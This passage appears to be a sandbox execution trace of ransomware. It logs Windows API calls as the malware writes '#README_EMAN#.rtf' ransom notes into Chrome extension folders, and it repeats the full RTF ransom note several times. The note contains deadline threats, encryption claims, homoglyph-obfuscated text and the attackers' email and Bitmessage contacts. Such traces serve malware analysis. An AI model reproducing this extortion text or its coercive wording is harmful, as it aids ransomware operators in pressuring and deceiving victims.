reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.518] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0272.518] WriteFile (in: hFile=0x2c8, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0272.519] CloseHandle (hObject=0x2c8) returned 1 [0272.519] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\#readme_eman#.rtf")) returned 0xffffffff [0272.519] GetLastError () returned 0x2 [0272.520] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0272.521] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. 